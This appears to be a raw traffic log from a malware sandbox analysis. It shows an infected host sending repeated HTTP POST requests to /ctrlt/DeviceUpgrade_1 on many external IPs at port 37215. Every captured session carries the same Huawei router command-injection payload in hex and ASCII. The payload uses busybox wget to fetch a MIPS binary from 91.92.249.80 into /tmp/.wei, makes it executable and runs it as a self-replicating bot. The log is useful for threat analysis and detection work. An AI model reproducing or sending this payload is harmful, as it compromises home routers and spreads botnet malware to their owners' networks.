                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1518192.168.2.2350166216.46.4.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476635933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1519192.168.2.2341908197.139.132.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476778030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1520192.168.2.235607236.7.47.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476778030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1521192.168.2.233775641.83.56.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476788998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1522192.168.2.2343820197.1.127.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476795912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1523192.168.2.2339056197.249.103.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476805925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1524192.168.2.2348776197.43.115.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476811886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1525192.168.2.2358534103.190.115.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.481755018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1526192.168.2.233600425.94.117.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.481765985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1527192.168.2.2357192157.208.63.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.482126951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
